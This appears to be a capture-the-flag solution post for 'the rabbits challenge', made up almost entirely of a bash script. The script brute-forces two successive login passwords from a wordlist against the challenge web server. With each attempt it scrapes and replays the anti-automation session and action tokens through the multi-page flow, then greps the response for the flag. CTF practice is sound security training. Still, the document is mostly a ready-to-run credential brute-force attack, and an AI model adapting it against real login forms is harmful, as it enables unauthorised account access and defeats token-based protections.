Solving the rabbits challenge: http://challenge.followthewhiterabbit.es:1234/ - @KALRONG 's style

pwn_rabbits.sh

#!/bin/bash

for word in $(cat passwordlist.lst)
do
 tokens=$(curl -c cookie.txt -b cookie.txt http://challenge.followthewhiterabbit.es:1234/ 2>/dev/null | grep value= | head -n2 | sed -E "s/.*value=(.*)>/\1/")
 token1=$(echo $tokens | cut -d' ' -f1)
 token2=$(echo $tokens | cut -d' ' -f2)

 echo "attempting word $word"

 result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$token1&token_action=$token2&pass_try=$word&submit=" http://challenge.followthewhiterabbit.es:1234/ 2>/dev/null)

 echo $result > latest.html

 if [ $(echo $result | grep 'second.php' | wc -l) -eq "1" ]; then
  first_pass=$word
  echo "The first password is: $word"

  tokens=$(echo $result | tr " " "\n" | grep value= | head -n2 | sed -E "s/.*value=(.*)>/\1/")
  token1=$(echo $tokens | cut -d' ' -f1)
  token2=$(echo $tokens | cut -d' ' -f2)
  result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$token1&token_action=$token2" http://challenge.followthewhiterabbit.es:1234/second.php?action=$token2 2>/dev/null)

  tokens=$(echo $result | sed -E "s/.*action=(.*)\".*/\1/")
  result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$tokens&token_action=$tokens" http://challenge.followthewhiterabbit.es:1234/third.php?action=$tokens 2>/dev/null)

  tokens=$(echo $result | sed -E "s/.*action=(.*)\".*/\1/")
  result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$tokens&token_action=$tokens" http://challenge.followthewhiterabbit.es:1234/final.php?action=$tokens 2>/dev/null)

  tokens=$(echo $result | tr " " "\n" | grep value= | head -n2 | sed -E "s/.*value=(.*)>/\1/")
  token1=$(echo $tokens | cut -d' ' -f1)
  token2=$(echo $tokens | cut -d' ' -f2)

  for word in $(cat passwordlist.lst)
  do
   echo "attempting word $word"

   result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$token1&token_action=$token2&pass_try=$word&submit=" http://challenge.followthewhiterabbit.es:1234/final.php 2>/dev/null)

   echo $result > latest.html

   if [ $(echo $result | grep 'Start over' | wc -l) -ne "1" ]; then
    echo "The final password is: $word"
    echo $result | grep flag
    exit
   fi

   tokens=$(curl -c cookie.txt -b cookie.txt http://challenge.followthewhiterabbit.es:1234/ 2>/dev/null | grep value= | head -n2 | sed -E "s/.*value=(.*)>/\1/")
   token1=$(echo $tokens | cut -d' ' -f1)
   token2=$(echo $tokens | cut -d' ' -f2)
   result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$token1&token_action=$token2&pass_try=$first_pass&submit=" http://challenge.followthewhiterabbit.es:1234/ 2>/dev/null)

   tokens=$(echo $result | tr " " "\n" | grep value= | head -n2 | sed -E "s/.*value=(.*)>/\1/")
   token1=$(echo $tokens | cut -d' ' -f1)
   token2=$(echo $tokens | cut -d' ' -f2)
   result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$token1&token_action=$token2" http://challenge.followthewhiterabbit.es:1234/second.php?action=$token2 2>/dev/null)

   tokens=$(echo $result | sed -E "s/.*action=(.*)\".*/\1/")
   result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$tokens&token_action=$tokens" http://challenge.followthewhiterabbit.es:1234/third.php?action=$tokens 2>/dev/null)

   tokens=$(echo $result | sed -E "s/.*action=(.*)\".*/\1/")
   result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$tokens&token_action=$tokens" http://challenge.followthewhiterabbit.es:1234/final.php?action=$tokens 2>/dev/null)

   tokens=$(echo $result | tr " " "\n" | grep value= | head -n2 | sed -E "s/.*value=(.*)>/\1/")
   token1=$(echo $tokens | cut -d' ' -f1)
   token2=$(echo $tokens | cut -d' ' -f2)
  done

  exit
 fi
done